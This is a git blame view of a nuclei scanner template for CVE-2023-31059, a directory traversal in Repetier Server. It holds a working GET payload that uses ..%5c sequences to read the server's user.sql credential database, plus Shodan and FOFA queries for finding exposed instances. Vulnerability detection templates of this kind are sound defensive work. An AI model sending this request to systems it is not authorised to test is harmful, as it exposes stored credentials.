nuclei-templates/http/cves/2023/CVE-2023-31059.yaml

40 lines
1.2 KiB
YAML
Raw Normal View History

2023-05-09 16:00:06 +00:00
id: CVE-2023-31059
info:
2023-05-12 18:29:05 +00:00
name: Repetier Server - Directory Traversal
2023-05-13 14:37:47 +00:00
author: parthmalhotra,pdresearch
2023-05-09 16:00:06 +00:00
severity: high
2023-05-12 18:29:05 +00:00
description: |
Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.
2023-05-09 16:00:06 +00:00
reference:
- https://cybir.com/2023/cve/poc-repetier-server-140/
- https://www.repetier-server.com/download-repetier-server/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-31059
cwe-id: CWE-22
epss-score: 0.00086
cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-05-09 16:00:06 +00:00
shodan-query: title:"Repetier-Server"
fofa-query: title="Repetier-Server"
2023-05-12 18:29:05 +00:00
tags: cve,cve2023,repetier,lfi
2023-05-09 16:00:06 +00:00
2023-05-09 16:16:34 +00:00
http:
2023-05-09 16:00:06 +00:00
- method: GET
path:
- "{{BaseURL}}/views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php"
2023-05-12 18:29:05 +00:00
matchers-condition: and
2023-05-09 16:00:06 +00:00
matchers:
- type: binary
part: body
binary:
- 53514C69746520666F726D6174203300
2023-05-12 18:29:05 +00:00
- type: status
status:
2023-05-13 14:37:47 +00:00
- 200